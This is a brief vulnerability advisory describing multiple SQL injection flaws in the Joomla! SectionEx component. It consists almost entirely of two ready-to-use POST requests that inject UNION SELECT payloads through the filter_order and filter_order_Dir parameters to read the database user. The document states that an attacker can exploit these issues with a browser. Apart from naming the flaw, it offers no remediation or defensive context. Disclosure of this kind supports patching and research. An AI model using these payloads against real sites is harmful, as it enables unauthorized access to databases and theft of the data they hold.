Joomla! SectionEx Component Multiple SQL Injection Vulnerabilities

Joomla! SectionEx Component Multiple SQL Injection Vulnerabilities

An attacker can exploit these issues using a browser.

The following example requests are available:

POST /index.php?option=com_sectionex&view=category&id=X&Itemid=Y

filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1
limit 1 offset 10000) union all (select
1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from
dual)%23&filter_order_Dir=DESC

POST /index.php?option=com_sectionex&view=category&id=X&Itemid=Y

filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1&filter_order_Dir=DESC
limit 1 offset 10000) union all (select
1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23